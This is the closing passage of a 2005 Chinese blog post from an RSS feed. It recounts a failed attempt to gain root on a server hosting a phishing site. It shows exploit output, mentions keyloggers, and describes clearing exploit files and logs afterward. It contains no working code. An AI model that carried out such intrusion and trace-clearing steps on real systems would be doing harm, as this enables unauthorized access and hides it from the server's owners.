race, wait...<br />[-] unable to exploit race in 30s,<br />kernel patched or load too high.<br />------------------------------------------------------------------------<br /><br /><br />尝试多个本地提权均未能成功！很郁闷！而在测试过程的时候，虚假网站已经被关闭了，虽然文件还在，但是很明显官方已经作了努力，并得到了不错的结果。<br />6、其他<br />找了几个linux的键盘记录，都要root权限。而服务器远程连接使用的ssh的，使用sniffer也估计没戏，所以暂时也没什么思路，清理exp、日志文件。<br />以上是我的一些测试的结果，结果也没有拿到root，不过我整理了一下相关的漏洞，希望对大家以后有些帮助。在站长群里发布了相关的结果，也没有人回话，不知道大家是太忙。。。<br />文中并未特殊处理漏洞及结果，有兴趣的可以直接利用，不过没必要为难其他站点，我想大家明白我的意思！<br />折腾了这么久，还有好多工作的事情要做！希望不会被老板说，呵呵！<br />最后感谢Edward、老黑及几位公司的高人</font><br />]]></description> 
<guid isPermaLink="false">3090881@http://heijin.bokee.com/</guid> 
<dc:subject>安全文摘</dc:subject> 
<dc:date>2005-10-01T10:40:50Z</dc:date> 
</item> 

</channel> 
</rss> 